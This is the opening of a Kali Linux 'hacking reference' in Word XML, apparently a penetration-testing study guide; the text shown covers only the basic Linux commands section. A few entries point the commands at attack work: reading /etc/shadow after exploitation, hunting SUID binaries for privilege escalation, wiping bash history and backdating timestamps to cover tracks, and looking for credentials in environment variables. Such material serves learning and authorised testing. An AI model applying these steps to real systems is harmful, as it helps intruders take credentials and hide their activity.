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80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">KALI LEARN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Hacking Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0f172a" w:val="clear"/>
        <w:spacing w:before="0" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="a3e635"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Fundamentals  ·  Kali Linux Tools  ·  Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="94a3b8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">From beginner to advanced — every essential tool documented with commands, flags, and real-world use cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748b"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Generated: 5 April 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111827"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Text &amp; File Processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireless Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Sniffing &amp; Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">11. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">12. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">13. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Social Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">14. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">15. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick Reference Card</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Essential Linux commands every hacker must know — navigation, file management, permissions, and system control.</w:t>
      </w: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ls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File Navigation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List directory contents — the first command every Linux user learns.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Shows all non-hidden files and directories in the current working directory.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 -l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Shows a detailed listing with permissions, number of links, owner, group, size, and modification date for each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 -l /home/user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 -a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Shows all files including hidden ones (files/directories that start with a dot, such as .bashrc or .ssh).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 -a ~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 -la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Combines -l and -a to show a detailed long listing of all files including hidden ones. This is the most commonly used ls command.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 -la /etc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 -lh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Like -l but prints file sizes in human-readable format (K, M, G) instead of raw bytes.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 -lh /var/log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 -R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Recursively lists all files and subdirectories within the specified directory.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 -R /etc/nginx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Long format — shows permissions, owner, size, and date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-a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 all files including hidden dotfiles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-h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 sizes in human-readable format (KB, MB, GB)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-R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Recursively list subdirectories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Checking what files are in a directory before editing or deleting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Verifying file permissions before running a script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Finding hidden configuration files in home directories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Checking file sizes to diagnose disk usage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Confirming a file was created or copied successfully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cd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File Navigation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Change directory — navigate the Linux filesystem.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cd /path/to/directory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Navigates to a directory using an absolute path (starting from the root /). Works regardless of where you currently are.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cd /var/log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cd directory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Navigates into a subdirectory relative to your current location. No leading slash needed.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cd Documents/projects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cd ..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Moves up one directory level to the parent directory. Chain multiple .. to go up several levels.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cd ../../etc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cd ~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Navigates to your home directory (/home/username). Running cd with no arguments does the same thing.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cd ~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cd -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Jumps back to the last directory you were in — useful for toggling between two locations.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cd -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Navigating to a project folder to run commands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Quickly returning to home directory from anywhere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Moving to parent directory to list sibling folders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Toggling between two working directories during a session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pwd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File Navigation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Print working directory — shows exactly where you are in the filesystem.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pwd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Outputs the full absolute path of the current working directory.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pwd
# Output: /home/kali/tools/nmap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pwd -P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the physical path, resolving all symbolic links. Useful when you have cd'd into a symlinked directory.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pwd -P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 the physical path, resolving all symlinks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Confirming your location before running rm or other destructive commands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Getting the full path to paste into a script or config file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Orienting yourself after cd'ing through several directories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Debugging scripts that change directories dynamically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mkdir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File Management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Make directory — create new folders in the filesystem.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mkdir directory_name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Creates a new directory with the given name in the current working directory.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mkdir projects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mkdir -p path/to/nested/dir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Creates the full directory path, including any intermediate directories that do not yet exist. Does not error if the directory already exists.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mkdir -p ~/tools/web/burp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mkdir dir1 dir2 dir3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Creates multiple directories at once by listing them separated by spaces.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mkdir recon exploit post-exploit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mkdir -m 755 directory_name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Creates a directory and immediately sets the specified permissions.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mkdir -m 700 ~/.ssh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 parent directories as needed, no error if exists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-m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Set file permission bits (mode) at creation time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Setting up a project structure for a new penetration test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Creating organized output directories for tool results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Creating the .ssh directory with correct permissions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Setting up log directories in scripts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rm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File Management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Remove files and directories — permanently deletes without a recycle bin. Use with caution.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rm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Permanently deletes a single file. There is no undo — the file is gone.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rm old_log.txt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rm -r directory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Removes a directory and all its contents recursively. Will prompt before removing.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rm -r old_project/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rm -f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Forces removal without prompting, even if the file is write-protected. Does not error if the file does not exist.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rm -f *.tmp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rm -rf directory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WARNING: Recursively and forcefully deletes an entire directory tree with no prompts and no undo. One of the most dangerous commands in Linux. Double-check your path! Never run as root unless absolutely necessary.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rm -rf /tmp/old_session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rm -i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Prompts for confirmation before deleting each file. Safer for beginners.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rm -i *.log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-r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Remove directories and their contents recursively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-f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Force removal, ignore nonexistent files, never prompt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-i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Prompt before every removal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Cleaning up temporary files after a pentest session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Removing old tool output directories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Deleting compiled binaries before rebuilding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Cleaning up downloaded payloads after testing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cp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File Management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Copy files and directories to a new location.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cp source destination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Copies a file to a new location or name. Overwrites the destination if it already exists.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cp report.txt report_backup.txt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cp file /path/to/directory/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Copies a file into the specified directory, keeping the original filename.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cp scan_results.txt ~/reports/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cp -r source_dir destination_dir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Copies an entire directory and all its contents to the destination path.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cp -r /opt/tools ~/tools_backup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cp -v source destination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Shows each file as it is being copied. Useful for monitoring progress.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cp -rv /etc/nginx ~/nginx_backup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cp -a source destination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Archive mode — preserves permissions, timestamps, ownership, and copies recursively. Best for backups.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cp -a /home/user ~/user_backup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-r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Copy directories recursively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-v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Verbose — print each file as it is copied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-a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Archive mode — preserve all attributes and copy recursively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Backing up a config file before editing it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Copying exploit scripts to a target working directory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Duplicating a wordlist for modification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Making a snapshot of tool output before processing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mv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File Management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Move or rename files and directories.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mv old_name new_name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Renames a file in the same directory.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mv report_draft.txt report_final.txt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mv file /path/to/directory/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Moves a file into the specified directory.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mv scan.xml ~/reports/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mv file1 file2 file3 /destination/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Moves multiple files to a destination directory.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mv *.log /var/log/archive/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mv -i source destination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Asks for confirmation before overwriting an existing file at the destination.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mv -i config.bak /etc/nginx/nginx.conf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-i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Prompt before overwriting an existing file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Renaming output files to add timestamps or labels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Organizing scan results into categorized directories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Moving downloaded tools to /opt or /usr/local/bin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Renaming a config file while testing a new version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cat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File Viewing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Concatenate and display file contents — the quickest way to read a file.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cat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the entire contents of a file to the terminal.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cat /etc/passwd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cat -n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file contents with line numbers prefixed to each line.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cat -n script.sh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cat file1 file2 &gt; combined.txt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Reads multiple files in sequence and writes the combined output to a new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cat part1.txt part2.txt &gt; full_report.txt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cat &gt; newfile.txt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Creates a new file and writes whatever you type until you press Ctrl+D.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cat &gt; notes.txt
This is my note.
Ctrl+D to save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cat &gt;&gt; existing.txt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Appends stdin input to an existing file without overwriting it.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cat &gt;&gt; targets.txt
10.0.0.5
Ctrl+D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Number all output lines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Quickly reading a config or log file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Viewing /etc/passwd or /etc/shadow during post-exploitation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Combining multiple wordlist files into one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Creating quick notes or small scripts from the terminal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Checking the contents of a downloaded file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less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File Viewing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Page through file contents interactively — better than cat for large files.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less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Opens a file for interactive viewing. Use arrow keys or j/k to scroll, / to search, n for next match, q to quit.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less /var/log/syslog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command | less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Pipes the output of any command into less so you can scroll through it interactively.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nmap -sV 192.168.1.0/24 | less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less +N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Opens the file at line number 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less +100 access.log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less +/pattern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Opens the file and jumps to the first occurrence of the pattern.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less +/error /var/log/apache2/error.log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Reading large log files without loading the whole file into memory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Scrolling through nmap output interactively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Reading man pages (man uses less by default)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Viewing large configuration files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head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File Viewing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Show the first lines of a file — useful for previewing file contents.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head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the first 10 lines of the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head /etc/passwd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head -n N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the first N lines of the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head -n 20 access.log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head -c N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the first N bytes of the file instead of lines.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head -c 100 binary_file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tail -n N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Shows the last N lines of a file. Complement to head.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tail -n 50 /var/log/auth.log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tail -f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Continuously outputs new lines as they are appended to the file. Essential for monitoring live logs. Press Ctrl+C to stop.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tail -f /var/log/apache2/access.log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Specify the number of lines to print (default: 10)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-c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 the first N bytes of each file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-f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Follow — output appended data as the file grows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Previewing the format of a CSV or log file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Monitoring Apache/Nginx access logs in real time with tail -f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Quickly checking the first entry of a wordlist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Watching auth.log for login attempts during an engagement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Inspecting the beginning of a binary or config file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touch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File Management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Create empty files or update file timestamps.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touch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Creates a new empty file. If the file already exists, its timestamp is updated.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touch notes.txt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touch file1 file2 file3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Creates multiple empty files at once.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touch recon.txt exploit.txt loot.txt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touch -t [[CC]YY]MMDDhhmm[.ss]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Sets the timestamp to a specific date and time.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touch -t 202401010000 oldfile.txt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 specified timestamp instead of current time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Creating placeholder files in a directory structure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Triggering file-based checks in scripts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Updating timestamps as part of cleanup or anti-forensics practice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Creating lock files in shell scripts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chmod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Permissions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Change file permissions — control who can read, write, and execute files.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chmod +x script.sh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Adds execute permission for all users (owner, group, others). The most common chmod command for running scripts.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chmod +x exploit.sh &amp;&amp; ./exploit.sh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chmod 755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Sets permissions to rwxr-xr-x: owner can read/write/execute, group and others can read/execute. Typical for executables.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chmod 755 /usr/local/bin/mytool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chmod 644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Sets permissions to rw-r--r--: owner can read/write, group and others can only read. Typical for config files.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chmod 644 ~/.bashrc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chmod 600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Sets permissions to rw-------: only the owner can read and write. Used for private keys and sensitive files.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chmod 600 ~/.ssh/id_rsa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chmod 777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Gives read, write, and execute to everyone. WARNING: This is a security risk — avoid using 777 in production.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chmod 777 /tmp/shared_script.sh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chmod u+x,g-w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Adds execute for owner, removes write for group using symbolic notation.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chmod u+x,o-r secret.sh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+x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Add execute permission for all users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u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User (owner)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Group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o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Others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+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Add permission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Remove permission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r/w/x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Read / Write / Execute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Making downloaded scripts executable before running them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Securing SSH private keys with chmod 600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Identifying misconfigured SUID/SGID files during privilege escalation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Setting web server file permissions correctly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Understanding why a script fails with "Permission denied"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chown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Permissions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Change file ownership — assign files to a different user or group.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chown username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Changes the owner of a file to the specified user.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chown www-data /var/www/html/index.html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chown username:groupname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Changes both the owner and the group of a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chown kali:kali ~/tools/exploit.py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chown -R username:group directory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Recursively changes ownership for a directory and all its contents.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chown -R www-data:www-data /var/www/html/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-R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Recursively change ownership of directory contents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Fixing ownership of web server files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Assigning copied files to the correct user after sudo operations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Understanding file ownership during privilege escalation research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Setting up shared directories for multiple users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find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File Search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Search for files and directories by name, type, size, permissions, and more.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find /path -name "filename"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Searches for files matching the exact name. Use wildcards for patterns.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find / -name "passwd" 2&gt;/dev/null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find /path -iname "*.conf"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Case-insensitive name search — finds .conf, .CONF, .Conf, etc.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find /etc -iname "*.conf"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find /path -type f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Find only files (-type f) or only directories (-type d) or symlinks (-type l).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find /home -type f -name "*.txt"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find / -perm -4000 -type f 2&gt;/dev/null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Finds all files with the SUID bit set. SUID binaries run as their owner (often root) regardless of who executes them — a key privilege escalation target.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find / -perm -4000 -type f 2&gt;/dev/null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find /path -mtime -N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Finds files modified in the last N days. Use -mmin for minutes.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find /etc -mtime -1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find /path -name "*.log" -exec rm {} \;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Finds matching files and runs a command on each. {} is replaced by the filename.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find /tmp -name "*.tmp" -exec rm {} \;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-iname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Case-insensitive name match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-type f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Match regular files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-type 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Match directories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-type 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Match symbolic links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-perm -4000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Find files with SUID bit set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-mtime -N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Modified less than N days ago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-mmin -N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Modified less than N minutes ago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-exec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Execute a command on each matched file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Locating SUID binaries for privilege escalation research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Finding world-writable files that could be abused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Searching for config files containing passwords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Finding recently modified files to detect intrusions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Locating a file when you do not know its directory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which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System Info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Locate executable commands — find where a program lives in your PATH.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which command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Returns the full path of the first matching executable in PATH.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which python3
# Output: /usr/bin/python3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which -a command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Returns all matching executables in PATH, not just the first.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which -a python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whereis command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Finds binary, source, and manual page for a command. More thorough than which.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whereis nmap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-a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 all matching pathnames, not just the first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Checking if a tool is installed before running it in a script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Finding the path to Python to use in a shebang line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Confirming which version of a tool will be invoked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Debugging PATH issues when commands are not found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man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Help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Manual pages — the built-in documentation for every Linux command.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man command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Opens the manual page for the specified command. Press q to quit, / to search.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man nmap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man N command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Opens the manual page from a specific section number.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man 5 crontab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man -k keyword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Searches all man page descriptions for a keyword. Equivalent to apropos.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man -k password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-k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Search man page descriptions for keyword (like apropos)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Looking up all available flags for a command without Googling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Understanding what a flag does before using it in production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Finding commands related to a task with man -k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Reading configuration file formats (section 5)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history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Shell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View and reuse your previous commands.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history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Lists all commands in your history with their number.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history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history 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Displays only the last N commands in history.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history 20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!N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Re-executes command number N from history.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!42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!!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Repeats the most recent command. Often used as sudo !! to re-run with sudo.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!!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history -c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Clears the current session history. Also delete ~/.bash_history to fully remove it.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history -c &amp;&amp; rm ~/.bash_history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-c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Clear the entire history list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Re-running a long nmap command without retyping it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Finding the exact flags used in a previous successful scan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Using Ctrl+R for reverse history search during active sessions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Clearing history as part of post-engagement cleanup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echo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Shell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Print text or variable values to the terminal.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"text"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the specified string to standard output.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"Hello, World!"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$VARIABLE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Expands and prints the value of an environment variable.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$HOME
echo $PATH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"text" &gt; file.txt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Writes the text to a file, overwriting its contents.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"192.168.1.1" &gt; target.txt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"text" &gt;&gt; file.txt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Appends text to the end of a file without overwriting.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"10.0.0.5" &gt;&gt; targets.txt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-e "line1\nline2"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Enables interpretation of escape sequences like \n (newline) and \t (tab).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-e "Name:\tKali\nOS:\tLinux"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Enable interpretation of backslash escape sequences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Printing status messages in shell scripts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Quickly writing a target IP to a file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Checking the value of environment variables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Generating simple config or payload files from scripts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env / export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Shell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View and set environment variables that control program behavior.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env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all current environment variables and their values.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env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$VARIABLE_NAME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the value of a specific environment variable.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$PATH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export VARIABLE=value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Creates or updates an environment variable and exports it so child processes inherit it.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export TARGET=192.168.1.100
export RHOST=$TARGET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VARIABLE=value command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Sets an environment variable only for the duration of a single command.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PYTHONPATH=/opt/mylib python3 script.py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unset VARIABLE_NAME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Removes an environment variable from the current session.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unset TARGET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Setting RHOST/LHOST variables for use in scripts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Adding a new tool directory to PATH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Checking if API keys or credentials are stored in the environment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Configuring tool behavior through environment variables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alias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Shell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Create shortcuts for frequently used commands.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alias name='command'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Creates a shortcut for the session. Quotes around the command are important.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alias ll='ls -la'
alias myip='curl ifconfig.me'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alias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all currently defined aliases.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alias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unalias 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Removes an alias from the current session.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unalias ll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"alias name='command'" &gt;&gt; ~/.bashrc &amp;&amp; source ~/.bashrc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Appends the alias to your bash profile and reloads it so it persists across sessions.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"alias nse='ls /usr/share/nmap/scripts/'" &gt;&gt; ~/.bashrc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Shortening frequently used nmap or msfvenom commands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Creating a quick alias for your target IP during a pentest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Aliasing dangerous commands to safer versions (alias rm='rm -i')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Speeding up repetitive workflow tasks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sudo / su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Permissions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Run commands as root or switch user — essential for privilege escalation understanding.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command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Executes the command with root privileges.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nmap -sS 192.168.1.0/24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-i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Starts an interactive root login shell.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-i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-l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Lists all commands the current user is allowed to run via sudo. A key privilege escalation 